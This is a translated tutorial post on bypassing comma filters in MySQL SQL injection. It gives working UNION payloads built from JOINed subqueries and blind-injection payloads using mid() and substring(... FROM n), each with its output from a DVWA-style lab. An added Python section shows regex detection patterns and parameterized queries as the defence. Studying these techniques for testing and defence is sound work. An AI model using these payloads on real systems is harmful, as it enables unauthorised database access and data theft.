
SQL Injection Tricks: Bypassing Comma Filtering in Visible and Blind Injection

Preface

SQL injection was once a very common vulnerability. As the general level of security has improved it has become much rarer, yet even today many websites are still running with SQL injection flaws. This article looks at one specific topic, bypassing a filter that blocks commas in SQL injection, and is shared here for reference and study. The details follow.

1. Bypassing the comma in UNION-based (visible) injection

In a UNION-based injection we use the form UNION SELECT 1,2,3,4,5,6,7..n to find the columns that are echoed back. Such a statement contains many commas, so if a WAF blocks commas the union query can no longer be used.

Bypass

Replace the placeholders in the echoed positions with the usual injection expressions or other statements:


union select 1,2,3;

union select * from ((select 1)A join (select 2)B join (select 3)C);

union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);

Demonstrating the union query in the database

The part from UNION onward is what we would inject through the URL; the rest is only there for the demonstration. In practice, if the injected statement contains commas it may be blocked.


mysql> select user_id, user, password from users union select 1,2,3;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|       1 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.04 sec)

Injecting without any comma, using JOIN instead


mysql> select user_id, user, password from users union select * from ((select 1)A join (select 2)B join (select 3)C);
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|       1 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)

Querying the data we want. Note that the arguments of this group_concat(...) call are themselves separated by commas, so this exact form would not pass a strict comma filter; the comma-free part is only the column list built from the joined subqueries.


mysql> select user_id, user, password from users union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);
+---------+-------+-------------------------------------------------+
| user_id | user  | password                                        |
+---------+-------+-------------------------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99                |
|       1 | 2     | root@192.168.228.1 dvwa c:\phpStudy\MySQL\data\ |
+---------+-------+-------------------------------------------------+
2 rows in set (0.08 sec)

2. Bypassing the comma in blind injection

MID and SUBSTR are functions that extract characters from a text field:


mysql> select mid(user(),1,2);
+-----------------+
| mid(user(),1,2) |
+-----------------+
| ro              |
+-----------------+
1 row in set (0.04 sec)

Querying the ASCII code of the first character of the database user name (ascii() returns the code of the leftmost character of its argument):


mysql> select user_id, user, password from users union select ascii(mid(user(),1,2)),2,3;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
|     114 | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)

Blind injection: guessing the ASCII value. A wrong guess returns no row, a correct one returns the row:


mysql> select user_id, user, password from users where user_id=1 and (select ascii(mid(user(),1,2))=115);
Empty set

mysql> select user_id, user, password from users where user_id=1 and (select ascii(mid(user(),1,2))=114);
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.04 sec)

Bypassing the comma with the SUBSTRING function

substring(str FROM pos)

Returns the substring of str starting at position pos; unlike substring(str, pos), this form contains no comma.


mysql> select substring('hello' from 1);
+---------------------------+
| substring('hello' from 1) |
+---------------------------+
| hello                     |
+---------------------------+
1 row in set (0.04 sec)

mysql> select substring('hello' from 2);
+---------------------------+
| substring('hello' from 2) |
+---------------------------+
| ello                      |
+---------------------------+
1 row in set (0.03 sec)

Injection


mysql> select user_id, user, password from users where user_id=1 and (ascii(substring(user() from 2))=114);
Empty set

// substring(user() from 2) starts with 'o'
// the ASCII code of 'o' is 111

mysql> select user_id, user, password from users where user_id=1 and (ascii(substring(user() from 2))=111);
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
|       1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.03 sec)
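Added example, not from the original article: a constructed Python demo of why a comma blocklist is the wrong control, using SQLite in place of MySQL so the join-based UNION from section 1 actually runs, with a pattern that flags both comma-free forms shown above next to a parameterized query that neither payload can affect. The substring(... FROM n) form is MySQL syntax and is only fed to the detection check here; the users table, the patterns and the blocklist rule are assumptions made for the demo.

```python
import re
import sqlite3

# Constructed demo: a comma-only blocklist of the kind the article defeats, the
# article's two comma-free payloads, and the defensive side: a signature for the
# shape of the bypass, and a parameterized query that the payloads cannot affect.
JOIN_PAYLOAD = "1 union select * from ((select 1)A join (select 2)B join (select 3)C)"
SUBSTRING_PAYLOAD = "1 and (ascii(substring(user() from 2))=111)"  # MySQL syntax, detection only


def comma_blocklist_allows(value: str) -> bool:
    """The naive WAF rule: reject only inputs that contain a comma."""
    return "," not in value


# Signatures for the two comma-free forms shown in the article (constructed here).
BYPASS_PATTERNS = [
    # UNION whose column list is built from joined one-column subqueries
    re.compile(r"\bunion\s+select\s+\*\s+from\s*\(\s*\(\s*select\b", re.I),
    # substring(expr FROM n), the comma-free spelling of substring(expr, n)
    re.compile(r"\bsubstring\s*\(.*?\bfrom\s+\d+\s*\)", re.I | re.S),
]


def flags_comma_free_injection(value: str) -> bool:
    """Detection: does the input have the shape of a comma-free bypass?"""
    return any(p.search(value) for p in BYPASS_PATTERNS)


def setup_db() -> sqlite3.Connection:
    """In-memory SQLite stand-in for the article's users table (constructed row)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users(user_id integer, user text, password text)")
    con.execute("insert into users values (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99')")
    return con


def query_concatenated(con: sqlite3.Connection, user_id: str) -> list:
    """Vulnerable pattern: the input is pasted into the SQL text and parsed as SQL."""
    sql = f"select user_id, user, password from users where user_id={user_id}"
    return con.execute(sql).fetchall()


def query_parameterized(con: sqlite3.Connection, user_id: str) -> list:
    """Fix: the input is bound as a value, so its SQL syntax is never parsed."""
    sql = "select user_id, user, password from users where user_id=?"
    return con.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    con = setup_db()
    print(comma_blocklist_allows(JOIN_PAYLOAD))       # True: the comma filter lets it through
    print(flags_comma_free_injection(JOIN_PAYLOAD))   # True: the shape signature catches it
    print(query_concatenated(con, JOIN_PAYLOAD))      # admin row plus the injected (1, 2, 3)
    print(query_parameterized(con, JOIN_PAYLOAD))     # []: the payload is just a non-matching value
```

The signature list is deliberately narrow and will not cover every rewrite of these payloads; the parameterized query is the control that holds regardless of spelling.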

Summary

That is all for this article. I hope its content is of some reference value for your study or work; if you have questions, leave a comment. Thank you for your support of 服务器之家.

Original article: http://HdhCmsTestcnblogs测试数据/hackxf/p/9490534.html
